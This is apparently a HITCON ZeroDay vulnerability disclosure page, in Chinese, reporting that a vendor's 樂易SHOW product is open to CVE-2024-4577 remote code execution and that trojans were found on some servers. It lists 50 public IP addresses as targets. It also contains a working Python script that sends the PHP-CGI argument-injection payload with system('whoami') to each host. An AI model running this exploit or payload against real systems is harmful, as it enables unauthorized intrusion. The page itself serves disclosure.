樂衍有限公司 樂易SHOW CVE-2024-4577 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00152
  •  發信 Vendor: 樂衍有限公司
  • Title: 樂衍有限公司 樂易SHOW CVE-2024-4577
  • Introduction: 旗下產品存在CVE-2024-4577漏洞,部分伺服器內發現木馬

處理狀態

目前狀態

公開
Last Update : 2025/04/10
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2025/02/08 19:42:07 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2025/02/08 19:44:37 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2025/02/09 02:09:31 : 新提交 (由 {{萌新}} 更新此狀態)
  • 2025/02/10 12:54:03 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/02/10 16:07:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/02/10 16:07:17 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2025/04/10 03:02:28 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2025-00152
  • 通報者:nhd1261 ({{萌新}})
  • 風險:嚴重
  • 類型:遠端命令執行 (Remote Code Execution)

參考資料

攻擊者可經由該漏洞取得主機完整權限、任意寫入檔案及取得大量內網資訊。

漏洞說明: OWASP - Code Injection
https://www.owasp.org/index.php/Code_Injection

漏洞說明: OWASP - Command Injection
https://www.owasp.org/index.php/Command_Injection

漏洞說明: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
http://cwe.mitre.org/data/definitions/77.html

漏洞說明: CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
http://cwe.mitre.org/data/definitions/78.html
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

122.116.19.242
220.134.230.157
114.32.164.179
59.127.250.108
1.34.253.196
125.229.67.74
125.229.181.44
114.32.42.233
114.33.162.164
114.34.40.92
125.228.72.220
220.133.25.162
1.34.102.142
114.33.139.6
1.173.155.31
220.133.91.17
220.135.33.89
114.34.37.215
59.115.183.211
122.116.7.237
114.34.118.1
59.127.199.12
122.116.157.165
122.117.32.226
114.34.145.24
122.116.184.61
122.116.86.173
61.221.6.171
1.34.119.83
125.229.209.199
114.34.226.201
125.229.8.193
122.117.184.34
211.22.72.98
1.34.90.49
220.135.200.40
122.117.208.18
220.132.52.84
125.229.215.214
114.32.212.65
125.228.118.186
203.69.243.253
1.173.148.43
114.34.31.187
59.115.138.138
59.127.54.252
125.227.125.187
59.127.141.169
114.32.74.86
1.173.144.141

敘述

旗下產品樂易SHOW存在CVE-2024-4577漏洞,部分伺服器內發現木馬,透過shodan掃描到在公網上有50個目標,撰寫以下腳本進行簡易測試,共有44個伺服器受影響,剩下6個連不上,但若還在使用,應該也存在漏洞。

import subprocess
# 設定 IP 清單檔案路徑
ip_file = "ips.txt"

# 讀取 IP 清單
try:
    with open(ip_file, "r") as f:
        ip_list = [line.strip() for line in f.readlines() if line.strip()]
except FileNotFoundError:
    print(f"[!] 找不到檔案: {ip_file}")
    exit(1)

# 存放受影響的 IP
vulnerable_ips = []

# 測試 CVE-2024-4577
for ip in ip_list:
    print(f"[*] 測試目標: {ip} ...")

    # 構造 curl 命令
    curl_cmd = f'curl.exe -k -o - "http://{ip}:8000/php-cgi/php-cgi.exe?%ADd+disable_functions%3d%26+%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" --data "<?php system(\'whoami\'); die(); ?>"'

    try:
        # 執行 curl 命令
        result = subprocess.run(curl_cmd, shell=True, capture_output=True, text=True, timeout=5)

        # 檢查回應是否包含 whoami 輸出 (如 "nt authority\system")
        if result.stdout.strip():
            print(f"[+] {ip} 受影響!回應: {result.stdout.strip()}")
            vulnerable_ips.append(ip)
        else:
            print(f"[-] {ip} 未受影響")

    except subprocess.TimeoutExpired:
        print(f"[!] {ip} 連線超時")
    except Exception as e:
        print(f"[!] {ip} 測試時發生錯誤: {str(e)}")

# 輸出受影響的 IP 數量
print("\n===============================")
print(f"共有 {len(vulnerable_ips)} 個目標受 CVE-2024-4577 影響:")
for ip in vulnerable_ips:
    print(f"- {ip}")

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;